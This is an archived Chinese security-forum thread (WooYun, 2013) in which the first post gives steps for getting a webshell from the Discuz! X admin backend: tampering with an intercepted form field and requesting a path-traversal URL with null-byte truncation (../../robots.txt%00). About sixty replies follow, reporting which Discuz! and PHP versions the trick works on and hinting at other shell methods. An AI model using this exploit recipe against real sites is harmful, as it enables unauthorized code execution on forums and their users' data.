dz x 后台怎么拿shell

2016-11-1 乌云zone - 永久存档 4966次访问

dz x 后台怎么拿shell

t00000by57 (no exploit) | 2013-05-24 04:57

用户 – 用户栏目 – 栏目分组抓包

Content-Disposition: form-data; name=”settingnew[profilegroupnew][base][available]”

改为

Content-Disposition: form-data; name=”settingnew[profilegroupnew][plugin][available]”

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

虽然涉及0x00截断但无视 GPC

就这样有钱的捧个钱场没钱的捧的人场谢谢

1#

Xhm1n9 | 2013-05-24 08:12

顶个，大半夜的不容易
2#

Cr4zy | 2013-05-24 08:19

感谢 +1
3#

wefgod (求大牛指点) | 2013-05-24 08:58

给力啊
4#

乐斗菜菜 | 2013-05-24 08:58

流弊,这个方法适用 x2 x2.5吗?
5#

HuGtion | 2013-05-24 09:04

给力
6#

CnCxzSec(衰仔) | 2013-05-24 09:13

这快天亮了真心不容易给力！
7#

最热微博 (((‮data;))) | 2013-05-24 09:16

给力
8#

楼上是马甲 | 2013-05-24 09:23

x2.5测试成功厉害
9#

楼上是马甲 | 2013-05-24 09:24

莫非楼主是toby57的马甲
我的偶像啊 -_-
10#

Master (小菜一枚) | 2013-05-24 10:04

不错。。。
11#

龙臣 (你站住了标准，你就成为了标准。) | 2013-05-24 10:16

不错
12#

bittertea (Bittertea.pw) | 2013-05-24 10:34

测试一下
13#

xcl0ud | 2013-05-24 10:38

Mark
14#

xsser | 2013-05-24 10:42

这兄弟是想拿乌云奖金的节奏啊
15#

saline (碧池就是碧池) | 2013-05-24 10:43

@楼上是马甲 @t00000by57 表示测试时没有抓到 Content-Disposition 头诶
16#

暴暴 | 2013-05-24 10:45

好东西啊。。哈哈，等了好久了的一个DZ 后台有救啦！！！
17#

coco | 2013-05-24 10:50

强悍
18#

debug | 2013-05-24 10:51

还有其他的办法呵呵
19#

do9gy | 2013-05-24 11:12

好像没能截断
20#

cnrstar (Be My Personal Best!) | 2013-05-24 11:18

牛逼啊、Mark
21#

t00000by57 (no exploit) | 2013-05-24 11:19

@do9gy php什么版本
22#

saline (碧池就是碧池) | 2013-05-24 11:29

@t00000by57 致敬！已成功复现！
23#

Sogili (.) 长短短 (.) | 2013-05-24 11:35

牛逼,已感谢
24#
感谢(1)

酱油甲 | 2013-05-24 11:46

MARK,已撸
25#

xsser | 2013-05-24 11:48

@Sogili 怎么现在社区付费意识这么高
26#

saline (碧池就是碧池) | 2013-05-24 12:32

php version 5.2.14
gpc = on
27#

sinck | 2013-05-24 12:35

@saline 也木找到
28#

dante | 2013-05-24 12:40

估计马上要被修复了
29#

P w | 2013-05-24 14:16

捧个人场。，
30#

DarkSun.Evil | 2013-05-24 14:22

牛B，真心的！呃… 似乎也没能截断。
31#
感谢(1)

Passer_by (腾讯微博的Passer-by不是我) | 2013-05-24 17:28

顶个，大半夜的不容易
32#

GaRY | 2013-05-24 17:34

@xsser 因为他们有钱人，有wb。我就不敢乱感谢
33#

江南的鱼 | 2013-05-24 20:23

给了我新希望啊
34#

江南的鱼 | 2013-05-24 20:56

截断成了悲剧，现在基本都php5.3以上了吧？反正我没能截断，我本地也没有办法生成需要的htm
35#

bittertea (Bittertea.pw) | 2013-05-25 11:23

测试了一下没有截断
36#

Vty | 2013-05-26 05:51

@xsser 你是牛逼吗？
37#

Mujj (为何我的眼中饱含泪水？因为我装逼装的深沉) | 2013-05-26 08:21

discuz X2.5-3.0
环境php<5.3
38#

do9gy | 2013-05-26 22:38

@t00000by57 5.4.11
39#

江南的鱼 | 2013-05-27 01:14

discuz X2 也存在，但是前提是要能截断
40#

My5t3ry | 2013-05-27 20:43

给力哇
41#

无我 | 2013-05-27 22:15

只能暴路径？作用不大！
42#

爱上平顶山 | 2013-05-29 02:09

@t00000by57 这个怎么抓包？用什么抓？谢谢了
43#

剑走偏锋 (贱走偏疯丨Mean deviation.) | 2013-05-30 12:22

@debug 还有什么办法啊、
44#

debug | 2013-05-30 20:00

@剑走偏锋这个不方便说。
45#

t00000by57 (no exploit) | 2013-05-30 20:06

@debug 是指前台那个执行么 ..
46#

debug | 2013-05-31 12:51

@t00000by57 不是前台的是别的呵呵
47#

江南的鱼 | 2013-06-01 13:17

至少还有2个方法能拿shell
48#

漫无目的 (爱好就是天赋) | 2013-06-17 18:52

同环境下 x2无法截断 x3正常包含
49#

also (阿里山的姑娘没水冲凉) | 2013-06-22 13:48

出现19楼的问题，坐等解决
50#

小乐天 (admin@example.com) | 2013-06-25 17:16

有时间试下
51#

darksn0w | 2013-07-03 15:57

@漫无目的你貌似是宝宝。。。。
52#

牛博恩 | 2013-07-12 14:11

未能截断。
53#

anyis | 2013-08-13 21:02

@漫无目的同样的未能找到可以控制htm的办法.
54#

BlackWidow7 (哇咔咔) | 2013-09-05 18:40

截断了还要写php脚本来进行一个上传。
55#

书生 (WooYun(白帽子技术社区)) | 2013-09-26 13:55

@江南的鱼再求一个方法
56#

Forever80s (~~~~~~~~) | 2013-10-17 00:39

X2 的不能用
57#

路人甲我来了 | 2013-12-06 00:57

= =这个在linux下不可以用吗？
58#

zeger | 2013-12-10 13:51

不能截断的也可以进一步利用~
59#

ice (%2F) | 2013-12-10 14:37

mark
60#

花生^_^ (加强学习~) | 2013-12-10 19:30

捧个人场~~